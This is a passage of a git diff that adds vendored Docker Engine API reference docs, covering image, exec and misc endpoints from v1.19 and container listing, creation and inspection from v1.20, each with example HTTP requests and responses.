"ubuntu:10.04" + ], + "Size": 182964289, + "Comment": "" + }, + { + "Id": "6cfa4d1f33fb861d4d114f43b25abd0ac737509268065cdfd69d544a59c85ab8", + "Created": 1398108222, + "CreatedBy": "/bin/sh -c #(nop) 
MAINTAINER Tianon Gravi - mkimage-debootstrap.sh -i iproute,iputils-ping,ubuntu-minimal -t lucid.tar.xz lucid http://archive.ubuntu.com/ubuntu/", + "Tags": null, + "Size": 0, + "Comment": "" + }, + { + "Id": "511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158", + "Created": 1371157430, + "CreatedBy": "", + "Tags": [ + "scratch12:latest", + "scratch:latest" + ], + "Size": 0, + "Comment": "Imported from -" + } + ] + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Push an image on the registry + +`POST /images/(name)/push` + +Push the image `name` on the registry + +**Example request**: + + POST /v1.19/images/test/push HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status": "Pushing..."} + {"status": "Pushing", "progress": "1/? (n/a)", "progressDetail": {"current": 1}}} + {"error": "Invalid..."} + ... + +If you wish to push an image on to a private registry, that image must already have a tag +into a repository which references that registry `hostname` and `port`. This repository name should +then be used in the URL. This duplicates the command line's flow. + +**Example request**: + + POST /v1.19/images/registry.acme.com:5000/test/push HTTP/1.1 + + +**Query parameters**: + +- **tag** – The tag to associate with the image on the registry. This is optional. + +**Request Headers**: + +- **X-Registry-Auth** – base64-encoded AuthConfig object. 
+ +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Tag an image into a repository + +`POST /images/(name)/tag` + +Tag the image `name` into a repository + +**Example request**: + + POST /v1.19/images/test/tag?repo=myrepo&force=0&tag=v42 HTTP/1.1 + +**Example response**: + + HTTP/1.1 201 Created + +**Query parameters**: + +- **repo** – The repository to tag in +- **force** – 1/True/true or 0/False/false, default false +- **tag** - The new tag name + +**Status codes**: + +- **201** – no error +- **400** – bad parameter +- **404** – no such image +- **409** – conflict +- **500** – server error + +#### Remove an image + +`DELETE /images/(name)` + +Remove the image `name` from the filesystem + +**Example request**: + + DELETE /v1.19/images/test HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-type: application/json + + [ + {"Untagged": "3e2f21a89f"}, + {"Deleted": "3e2f21a89f"}, + {"Deleted": "53b4f83ac9"} + ] + +**Query parameters**: + +- **force** – 1/True/true or 0/False/false, default false +- **noprune** – 1/True/true or 0/False/false, default false + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **409** – conflict +- **500** – server error + +#### Search images + +`GET /images/search` + +Search for an image on [Docker Hub](https://hub.docker.com). This API +returns both `is_trusted` and `is_automated` images. Currently, they +are considered identical. In the future, the `is_trusted` property will +be deprecated and replaced by the `is_automated` property. + +> **Note**: +> The response keys have changed from API v1.6 to reflect the JSON +> sent by the registry server to the docker daemon's request. 
+ +**Example request**: + + GET /v1.19/images/search?term=sshd HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "star_count": 12, + "is_official": false, + "name": "wma55/u1210sshd", + "is_trusted": false, + "is_automated": false, + "description": "" + }, + { + "star_count": 10, + "is_official": false, + "name": "jdswinbank/sshd", + "is_trusted": false, + "is_automated": false, + "description": "" + }, + { + "star_count": 18, + "is_official": false, + "name": "vgauthier/sshd", + "is_trusted": false, + "is_automated": false, + "description": "" + } + ... + ] + +**Query parameters**: + +- **term** – term to search + +**Status codes**: + +- **200** – no error +- **500** – server error + +### 2.3 Misc + +#### Check auth configuration + +`POST /auth` + +Get the default username and email + +**Example request**: + + POST /v1.19/auth HTTP/1.1 + Content-Type: application/json + + { + "username": "hannibal", + "password": "xxxx", + "email": "hannibal@a-team.com", + "serveraddress": "https://index.docker.io/v1/" + } + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** – no error +- **204** – no error +- **500** – server error + +#### Display system-wide information + +`GET /info` + +Display system-wide information + +**Example request**: + + GET /v1.19/info HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Containers": 11, + "CpuCfsPeriod": true, + "CpuCfsQuota": true, + "Debug": false, + "DockerRootDir": "/var/lib/docker", + "Driver": "btrfs", + "DriverStatus": [[""]], + "ExecutionDriver": "native-0.1", + "ExperimentalBuild": false, + "HttpProxy": "http://test:test@localhost:8080", + "HttpsProxy": "https://test:test@localhost:8080", + "ID": "7TRN:IPZB:QYBB:VPBQ:UMPP:KARE:6ZNR:XE6T:7EWV:PKF4:ZOJD:TPYS", + "IPv4Forwarding": true, + "Images": 16, + "IndexServerAddress": "https://index.docker.io/v1/", + "InitPath": "/usr/bin/docker", + "InitSha1": "", + 
"KernelVersion": "3.12.0-1-amd64", + "Labels": [ + "storage=ssd" + ], + "MemTotal": 2099236864, + "MemoryLimit": true, + "NCPU": 1, + "NEventsListener": 0, + "NFd": 11, + "NGoroutines": 21, + "Name": "prod-server-42", + "NoProxy": "9.81.1.160", + "OomKillDisable": true, + "OperatingSystem": "Boot2Docker", + "RegistryConfig": { + "IndexConfigs": { + "docker.io": { + "Mirrors": null, + "Name": "docker.io", + "Official": true, + "Secure": true + } + }, + "InsecureRegistryCIDRs": [ + "127.0.0.0/8" + ] + }, + "SwapLimit": false, + "SystemTime": "2015-03-10T11:11:23.730591467-07:00" + } + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Show the docker version information + +`GET /version` + +Show the docker version information + +**Example request**: + + GET /v1.19/version HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Version": "1.5.0", + "Os": "linux", + "KernelVersion": "3.18.5-tinycore64", + "GoVersion": "go1.4.1", + "GitCommit": "a8a31ef", + "Arch": "amd64", + "ApiVersion": "1.19" + } + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Ping the docker server + +`GET /_ping` + +Ping the docker server + +**Example request**: + + GET /v1.19/_ping HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: text/plain + + OK + +**Status codes**: + +- **200** - no error +- **500** - server error + +#### Create a new image from a container's changes + +`POST /commit` + +Create a new image from a container's changes + +**Example request**: + + POST /v1.19/commit?container=44c004db4b17&comment=message&repo=myrepo HTTP/1.1 + Content-Type: application/json + + { + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "PortSpecs": null, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": null, + "Cmd": [ + "date" + ], + "Volumes": { + "/tmp": {} + }, + "Labels": { + "key1": 
"value1", + "key2": "value2" + }, + "WorkingDir": "", + "NetworkDisabled": false, + "ExposedPorts": { + "22/tcp": {} + } + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + {"Id": "596069db4bf5"} + +**JSON parameters**: + +- **config** - the container's configuration + +**Query parameters**: + +- **container** – source container +- **repo** – repository +- **tag** – tag +- **comment** – commit message +- **author** – author (e.g., "John Hannibal Smith + <[hannibal@a-team.com](mailto:hannibal%40a-team.com)>") + +**Status codes**: + +- **201** – no error +- **404** – no such container +- **500** – server error + +#### Monitor Docker's events + +`GET /events` + +Get container events from docker, in real time via streaming. + +Docker containers report the following events: + + attach, commit, copy, create, destroy, die, exec_create, exec_start, export, kill, oom, pause, rename, resize, restart, start, stop, top, unpause + +Docker images report the following events: + + untag, delete + +**Example request**: + + GET /v1.19/events?since=1374067924 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status": "create", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067924} + {"status": "start", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067924} + {"status": "stop", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067966} + {"status": "destroy", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067970} + +**Query parameters**: + +- **since** – Timestamp. Show all events created since timestamp and then stream +- **until** – Timestamp. Show events created until given timestamp and stop streaming +- **filters** – A json encoded value of the filters (a map[string][]string) to process on the event list. 
Available filters: + - `container=`; -- container to filter + - `event=`; -- event to filter + - `image=`; -- image to filter + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Get a tarball containing all images in a repository + +`GET /images/(name)/get` + +Get a tarball containing all images and metadata for the repository specified +by `name`. + +If `name` is a specific name and tag (e.g. ubuntu:latest), then only that image +(and its parents) are returned. If `name` is an image ID, similarly only that +image (and its parents) are returned, but with the exclusion of the +'repositories' file in the tarball, as there were no image names referenced. + +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + GET /v1.19/images/ubuntu/get + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + Binary data stream + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Get a tarball containing all images + +`GET /images/get` + +Get a tarball containing all images and metadata for one or more repositories. + +For each value of the `names` parameter: if it is a specific name and tag (e.g. +`ubuntu:latest`), then only that image (and its parents) are returned; if it is +an image ID, similarly only that image (and its parents) are returned and there +would be no names referenced in the 'repositories' file for this image ID. + +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + GET /v1.19/images/get?names=myname%2Fmyapp%3Alatest&names=busybox + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + Binary data stream + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Load a tarball with a set of images and tags into docker + +`POST /images/load` + +Load a set of images and tags into a Docker repository. 
+See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + POST /v1.19/images/load + Content-Type: application/x-tar + + Tarball in body + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Image tarball format + +An image tarball contains one directory per image layer (named using its long ID), +each containing these files: + +- `VERSION`: currently `1.0` - the file format version +- `json`: detailed layer information, similar to `docker inspect layer_id` +- `layer.tar`: A tarfile containing the filesystem changes in this layer + +The `layer.tar` file contains `aufs` style `.wh..wh.aufs` files and directories +for storing attribute changes and deletions. + +If the tarball defines a repository, the tarball should also include a `repositories` file at +the root that contains a list of repository and tag names mapped to layer IDs. + +``` +{"hello-world": + {"latest": "565a9d68a73f6706862bfe8409a7f659776d4d60a8d096eb4a3cbce6999cc2a1"} +} +``` + +#### Exec Create + +`POST /containers/(id or name)/exec` + +Sets up an exec instance in a running container `id` + +**Example request**: + + POST /v1.19/containers/e90e34656806/exec HTTP/1.1 + Content-Type: application/json + + { + "AttachStdin": true, + "AttachStdout": true, + "AttachStderr": true, + "Cmd": ["sh"], + "Tty": true, + "User": "123:456" + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Id": "f90e34656806", + "Warnings":[] + } + +**JSON parameters**: + +- **AttachStdin** - Boolean value, attaches to `stdin` of the `exec` command. +- **AttachStdout** - Boolean value, attaches to `stdout` of the `exec` command. +- **AttachStderr** - Boolean value, attaches to `stderr` of the `exec` command. +- **Tty** - Boolean value to allocate a pseudo-TTY. +- **Cmd** - Command to run specified as a string or an array of strings. 
+- **User** - A string value specifying the user, and optionally, group to run + the exec process inside the container. Format is one of: `"user"`, + `"user:group"`, `"uid"`, or `"uid:gid"`. + +**Status codes**: + +- **201** – no error +- **404** – no such container + +#### Exec Start + +`POST /exec/(id)/start` + +Starts a previously set up `exec` instance `id`. If `detach` is true, this API +returns after starting the `exec` command. Otherwise, this API sets up an +interactive session with the `exec` command. + +**Example request**: + + POST /v1.19/exec/e90e34656806/start HTTP/1.1 + Content-Type: application/json + + { + "Detach": false, + "Tty": false + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/vnd.docker.raw-stream + + {% raw %} + {{ STREAM }} + {% endraw %} + +**JSON parameters**: + +- **Detach** - Detach from the `exec` command. +- **Tty** - Boolean value to allocate a pseudo-TTY. + +**Status codes**: + +- **200** – no error +- **404** – no such exec instance + +**Stream details**: + +Similar to the stream behavior of `POST /containers/(id or name)/attach` API + +#### Exec Resize + +`POST /exec/(id)/resize` + +Resizes the `tty` session used by the `exec` command `id`. The unit is number of characters. +This API is valid only if `tty` was specified as part of creating and starting the `exec` command. + +**Example request**: + + POST /v1.19/exec/e90e34656806/resize?h=40&w=80 HTTP/1.1 + Content-Type: text/plain + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: text/plain + +**Query parameters**: + +- **h** – height of `tty` session +- **w** – width + +**Status codes**: + +- **201** – no error +- **404** – no such exec instance + +#### Exec Inspect + +`GET /exec/(id)/json` + +Return low-level information about the `exec` command `id`. 
+ +**Example request**: + + GET /v1.19/exec/11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: plain/text + + { + "ID" : "11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39", + "Running" : false, + "ExitCode" : 2, + "ProcessConfig" : { + "privileged" : false, + "user" : "", + "tty" : false, + "entrypoint" : "sh", + "arguments" : [ + "-c", + "exit 2" + ] + }, + "OpenStdin" : false, + "OpenStderr" : false, + "OpenStdout" : false, + "Container" : { + "State" : { + "Running" : true, + "Paused" : false, + "Restarting" : false, + "OOMKilled" : false, + "Pid" : 3650, + "ExitCode" : 0, + "Error" : "", + "StartedAt" : "2014-11-17T22:26:03.717657531Z", + "FinishedAt" : "0001-01-01T00:00:00Z" + }, + "ID" : "8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c", + "Created" : "2014-11-17T22:26:03.626304998Z", + "Path" : "date", + "Args" : [], + "Config" : { + "Hostname" : "8f177a186b97", + "Domainname" : "", + "User" : "", + "AttachStdin" : false, + "AttachStdout" : false, + "AttachStderr" : false, + "PortSpecs": null, + "ExposedPorts" : null, + "Tty" : false, + "OpenStdin" : false, + "StdinOnce" : false, + "Env" : [ "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" ], + "Cmd" : [ + "date" + ], + "Image" : "ubuntu", + "Volumes" : null, + "WorkingDir" : "", + "Entrypoint" : null, + "NetworkDisabled" : false, + "MacAddress" : "", + "OnBuild" : null, + "SecurityOpt" : null + }, + "Image" : "5506de2b643be1e6febbf3b8a240760c6843244c41e12aa2f60ccbb7153d17f5", + "NetworkSettings" : { + "IPAddress" : "172.17.0.2", + "IPPrefixLen" : 16, + "MacAddress" : "02:42:ac:11:00:02", + "Gateway" : "172.17.42.1", + "Bridge" : "docker0", + "PortMapping" : null, + "Ports" : {} + }, + "ResolvConfPath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/resolv.conf", + "HostnamePath" : 
"/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/hostname", + "HostsPath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/hosts", + "LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log", + "Name" : "/test", + "Driver" : "aufs", + "ExecDriver" : "native-0.2", + "MountLabel" : "", + "ProcessLabel" : "", + "AppArmorProfile" : "", + "RestartCount" : 0, + "Volumes" : {}, + "VolumesRW" : {} + } + } + +**Status codes**: + +- **200** – no error +- **404** – no such exec instance +- **500** - server error + +## 3. Going further + +### 3.1 Inside `docker run` + +As an example, the `docker run` command line makes the following API calls: + +- Create the container + +- If the status code is 404, it means the image doesn't exist: + - Try to pull it. + - Then, retry to create the container. + +- Start the container. + +- If you are not in detached mode: +- Attach to the container, using `logs=1` (to have `stdout` and + `stderr` from the container's start) and `stream=1` + +- If in detached mode or only `stdin` is attached, display the container's id. + +### 3.2 Hijacking + +In this version of the API, `/attach`, uses hijacking to transport `stdin`, +`stdout`, and `stderr` on the same socket. + +To hint potential proxies about connection hijacking, Docker client sends +connection upgrade headers similarly to websocket. + + Upgrade: tcp + Connection: Upgrade + +When Docker daemon detects the `Upgrade` header, it switches its status code +from **200 OK** to **101 UPGRADED** and resends the same headers. + + +### 3.3 CORS Requests + +To set cross origin requests to the Engine API please give values to +`--api-cors-header` when running Docker in daemon mode. 
Set `*` (asterisk) to allow requests from all origins;
+the default (blank) means CORS is disabled
+
+    $ docker -d -H="192.168.1.9:2375" --api-cors-header="http://foo.bar"
diff --git a/vendor/github.com/docker/docker/docs/api/v1.20.md b/vendor/github.com/docker/docker/docs/api/v1.20.md
new file mode 100644
index 0000000000..2532c49950
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/api/v1.20.md
@@ -0,0 +1,2391 @@
+---
+title: "Engine API v1.20"
+description: "API Documentation for Docker"
+keywords: "API, Docker, rcli, REST, documentation"
+redirect_from:
+- /engine/reference/api/docker_remote_api_v1.20/
+- /reference/api/docker_remote_api_v1.20/
+---
+
+
+
+## 1. Brief introduction
+
+ - The daemon listens on `unix:///var/run/docker.sock` but you can
+   [Bind Docker to another host/port or a Unix socket](../reference/commandline/dockerd.md#bind-docker-to-another-host-port-or-a-unix-socket).
+ - The API tends to be REST. However, for some complex commands, like `attach`
+   or `pull`, the HTTP connection is hijacked to transport `stdout`,
+   `stdin` and `stderr`.
+
+## 2.
Endpoints + +### 2.1 Containers + +#### List containers + +`GET /containers/json` + +List containers + +**Example request**: + + GET /v1.20/containers/json?all=1&before=8dfafdbc3a40&size=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Id": "8dfafdbc3a40", + "Names":["/boring_feynman"], + "Image": "ubuntu:latest", + "Command": "echo 1", + "Created": 1367854155, + "Status": "Exit 0", + "Ports": [{"PrivatePort": 2222, "PublicPort": 3333, "Type": "tcp"}], + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "SizeRw": 12288, + "SizeRootFs": 0 + }, + { + "Id": "9cd87474be90", + "Names":["/coolName"], + "Image": "ubuntu:latest", + "Command": "echo 222222", + "Created": 1367854155, + "Status": "Exit 0", + "Ports": [], + "Labels": {}, + "SizeRw": 12288, + "SizeRootFs": 0 + }, + { + "Id": "3176a2479c92", + "Names":["/sleepy_dog"], + "Image": "ubuntu:latest", + "Command": "echo 3333333333333333", + "Created": 1367854154, + "Status": "Exit 0", + "Ports":[], + "Labels": {}, + "SizeRw":12288, + "SizeRootFs":0 + }, + { + "Id": "4cb07b47f9fb", + "Names":["/running_cat"], + "Image": "ubuntu:latest", + "Command": "echo 444444444444444444444444444444444", + "Created": 1367854152, + "Status": "Exit 0", + "Ports": [], + "Labels": {}, + "SizeRw": 12288, + "SizeRootFs": 0 + } + ] + +**Query parameters**: + +- **all** – 1/True/true or 0/False/false, Show all containers. + Only running containers are shown by default (i.e., this defaults to false) +- **limit** – Show `limit` last created + containers, include non-running ones. +- **since** – Show only containers created since Id, include + non-running ones. +- **before** – Show only containers created before Id, include + non-running ones. +- **size** – 1/True/true or 0/False/false, Show the containers + sizes +- **filters** - a JSON encoded value of the filters (a `map[string][]string`) to process on the containers list. 
Available filters: + - `exited=`; -- containers with exit code of `` ; + - `status=`(`created`|`restarting`|`running`|`paused`|`exited`) + - `label=key` or `label="key=value"` of a container label + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **500** – server error + +#### Create a container + +`POST /containers/create` + +Create a container + +**Example request**: + + POST /v1.20/containers/create HTTP/1.1 + Content-Type: application/json + + { + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": [ + "FOO=bar", + "BAZ=quux" + ], + "Cmd": [ + "date" + ], + "Entrypoint": null, + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "Volumes": { + "/volumes/data": {} + }, + "WorkingDir": "", + "NetworkDisabled": false, + "MacAddress": "12:34:56:78:9a:bc", + "ExposedPorts": { + "22/tcp": {} + }, + "HostConfig": { + "Binds": ["/tmp:/tmp"], + "Links": ["redis3:redis"], + "LxcConf": {"lxc.utsname":"docker"}, + "Memory": 0, + "MemorySwap": 0, + "CpuShares": 512, + "CpuPeriod": 100000, + "CpuQuota": 50000, + "CpusetCpus": "0,1", + "CpusetMems": "0,1", + "BlkioWeight": 300, + "MemorySwappiness": 60, + "OomKillDisable": false, + "PidMode": "", + "PortBindings": { "22/tcp": [{ "HostPort": "11022" }] }, + "PublishAllPorts": false, + "Privileged": false, + "ReadonlyRootfs": false, + "Dns": ["8.8.8.8"], + "DnsSearch": [""], + "ExtraHosts": null, + "VolumesFrom": ["parent", "other:ro"], + "CapAdd": ["NET_ADMIN"], + "CapDrop": ["MKNOD"], + "GroupAdd": ["newgroup"], + "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 }, + "NetworkMode": "bridge", + "Devices": [], + "Ulimits": [{}], + "LogConfig": { "Type": "json-file", "Config": {} }, + "SecurityOpt": [], + "CgroupParent": "" + } + } + +**Example response**: + + HTTP/1.1 201 Created 
+ Content-Type: application/json + + { + "Id":"e90e34656806", + "Warnings":[] + } + +**JSON parameters**: + +- **Hostname** - A string value containing the hostname to use for the + container. +- **Domainname** - A string value containing the domain name to use + for the container. +- **User** - A string value specifying the user inside the container. +- **AttachStdin** - Boolean value, attaches to `stdin`. +- **AttachStdout** - Boolean value, attaches to `stdout`. +- **AttachStderr** - Boolean value, attaches to `stderr`. +- **Tty** - Boolean value, Attach standard streams to a `tty`, including `stdin` if it is not closed. +- **OpenStdin** - Boolean value, opens `stdin`, +- **StdinOnce** - Boolean value, close `stdin` after the 1 attached client disconnects. +- **Env** - A list of environment variables in the form of `["VAR=value", ...]` +- **Labels** - Adds a map of labels to a container. To specify a map: `{"key":"value", ... }` +- **Cmd** - Command to run specified as a string or an array of strings. +- **Entrypoint** - Set the entry point for the container as a string or an array + of strings. +- **Image** - A string specifying the image name to use for the container. +- **Volumes** - An object mapping mount point paths (strings) inside the + container to empty objects. +- **WorkingDir** - A string specifying the working directory for commands to + run in. +- **NetworkDisabled** - Boolean value, when true disables networking for the + container +- **ExposedPorts** - An object mapping ports to an empty object in the form of: + `"ExposedPorts": { "/: {}" }` +- **HostConfig** + - **Binds** – A list of bind-mounts for this container. Each item is a string in one of these forms: + + `host-src:container-dest` to bind-mount a host path into the + container. Both `host-src`, and `container-dest` must be an + _absolute_ path. + + `host-src:container-dest:ro` to make the bind-mount read-only + inside the container. 
Both `host-src`, and `container-dest` must be + an _absolute_ path. + - **Links** - A list of links for the container. Each link entry should be + in the form of `container_name:alias`. + - **LxcConf** - LXC specific configurations. These configurations only + work when using the `lxc` execution driver. + - **Memory** - Memory limit in bytes. + - **MemorySwap** - Total memory limit (memory + swap); set `-1` to enable unlimited swap. + You must use this with `memory` and make the swap value larger than `memory`. + - **CpuShares** - An integer value containing the container's CPU Shares + (ie. the relative weight vs other containers). + - **CpuPeriod** - The length of a CPU period in microseconds. + - **CpuQuota** - Microseconds of CPU time that the container can get in a CPU period. + - **CpusetCpus** - String value containing the `cgroups CpusetCpus` to use. + - **CpusetMems** - Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems. + - **BlkioWeight** - Block IO weight (relative weight) accepts a weight value between 10 and 1000. + - **MemorySwappiness** - Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100. + - **OomKillDisable** - Boolean value, whether to disable OOM Killer for the container or not. + - **PidMode** - Set the PID (Process) Namespace mode for the container; + `"container:"`: joins another container's PID namespace + `"host"`: use the host's PID namespace inside the container + - **PortBindings** - A map of exposed container ports and the host port they + should map to. A JSON object in the form + `{ /: [{ "HostPort": "" }] }` + Take note that `port` is specified as a string and not an integer value. + - **PublishAllPorts** - Allocates a random host port for all of a container's + exposed ports. Specified as a boolean value. + - **Privileged** - Gives the container full access to the host. Specified as + a boolean value. 
+ - **ReadonlyRootfs** - Mount the container's root filesystem as read only. + Specified as a boolean value. + - **Dns** - A list of DNS servers for the container to use. + - **DnsSearch** - A list of DNS search domains + - **ExtraHosts** - A list of hostnames/IP mappings to add to the + container's `/etc/hosts` file. Specified in the form `["hostname:IP"]`. + - **VolumesFrom** - A list of volumes to inherit from another container. + Specified in the form `[:]` + - **CapAdd** - A list of kernel capabilities to add to the container. + - **Capdrop** - A list of kernel capabilities to drop from the container. + - **GroupAdd** - A list of additional groups that the container process will run as + - **RestartPolicy** – The behavior to apply when the container exits. The + value is an object with a `Name` property of either `"always"` to + always restart or `"on-failure"` to restart only when the container + exit code is non-zero. If `on-failure` is used, `MaximumRetryCount` + controls the number of times to retry before giving up. + The default is not to restart. (optional) + An ever increasing delay (double the previous delay, starting at 100mS) + is added before each restart to prevent flooding the server. + - **NetworkMode** - Sets the networking mode for the container. Supported + values are: `bridge`, `host`, `none`, and `container:` + - **Devices** - A list of devices to add to the container specified as a JSON object in the + form + `{ "PathOnHost": "/dev/deviceName", "PathInContainer": "/dev/deviceName", "CgroupPermissions": "mrw"}` + - **Ulimits** - A list of ulimits to set in the container, specified as + `{ "Name": , "Soft": , "Hard": }`, for example: + `Ulimits: { "Name": "nofile", "Soft": 1024, "Hard": 2048 }` + - **SecurityOpt**: A list of string values to customize labels for MLS + systems, such as SELinux. + - **LogConfig** - Log configuration for the container, specified as a JSON object in the form + `{ "Type": "", "Config": {"key1": "val1"}}`. 
+ Available types: `json-file`, `syslog`, `journald`, `gelf`, `none`. + `json-file` logging driver. + - **CgroupParent** - Path to `cgroups` under which the container's `cgroup` is created. If the path is not absolute, the path is considered to be relative to the `cgroups` path of the init process. Cgroups are created if they do not already exist. + +**Query parameters**: + +- **name** – Assign the specified name to the container. Must + match `/?[a-zA-Z0-9_-]+`. + +**Status codes**: + +- **201** – no error +- **400** – bad parameter +- **404** – no such container +- **406** – impossible to attach (container not running) +- **409** – conflict +- **500** – server error + +#### Inspect a container + +`GET /containers/(id or name)/json` + +Return low-level information on the container `id` + +**Example request**: + + GET /v1.20/containers/4fa6e0f0c678/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "AppArmorProfile": "", + "Args": [ + "-c", + "exit 9" + ], + "Config": { + "AttachStderr": true, + "AttachStdin": false, + "AttachStdout": true, + "Cmd": [ + "/bin/sh", + "-c", + "exit 9" + ], + "Domainname": "", + "Entrypoint": null, + "Env": [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "ExposedPorts": null, + "Hostname": "ba033ac44011", + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "MacAddress": "", + "NetworkDisabled": false, + "OnBuild": null, + "OpenStdin": false, + "StdinOnce": false, + "Tty": false, + "User": "", + "Volumes": null, + "WorkingDir": "" + }, + "Created": "2015-01-06T15:47:31.485331387Z", + "Driver": "devicemapper", + "ExecDriver": "native-0.2", + "ExecIDs": null, + "HostConfig": { + "Binds": null, + "BlkioWeight": 0, + "CapAdd": null, + "CapDrop": null, + "ContainerIDFile": "", + "CpusetCpus": "", + "CpusetMems": "", + "CpuShares": 0, + "CpuPeriod": 100000, + "Devices": [], + 
"Dns": null, + "DnsSearch": null, + "ExtraHosts": null, + "IpcMode": "", + "Links": null, + "LxcConf": [], + "Memory": 0, + "MemorySwap": 0, + "OomKillDisable": false, + "NetworkMode": "bridge", + "PidMode": "", + "PortBindings": {}, + "Privileged": false, + "ReadonlyRootfs": false, + "PublishAllPorts": false, + "RestartPolicy": { + "MaximumRetryCount": 2, + "Name": "on-failure" + }, + "LogConfig": { + "Config": null, + "Type": "json-file" + }, + "SecurityOpt": null, + "VolumesFrom": null, + "Ulimits": [{}] + }, + "HostnamePath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hostname", + "HostsPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hosts", + "LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log", + "Id": "ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39", + "Image": "04c5d3b7b0656168630d3ba35d8889bd0e9caafcaeb3004d2bfbc47e7c5d35d2", + "MountLabel": "", + "Name": "/boring_euclid", + "NetworkSettings": { + "Bridge": "", + "Gateway": "", + "IPAddress": "", + "IPPrefixLen": 0, + "MacAddress": "", + "PortMapping": null, + "Ports": null + }, + "Path": "/bin/sh", + "ProcessLabel": "", + "ResolvConfPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/resolv.conf", + "RestartCount": 1, + "State": { + "Error": "", + "ExitCode": 9, + "FinishedAt": "2015-01-06T15:47:32.080254511Z", + "OOMKilled": false, + "Paused": false, + "Pid": 0, + "Restarting": false, + "Running": true, + "StartedAt": "2015-01-06T15:47:32.072697474Z" + }, + "Mounts": [ + { + "Source": "/data", + "Destination": "/data", + "Mode": "ro,Z", + "RW": false + } + ] + } + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### List processes running inside a container + 
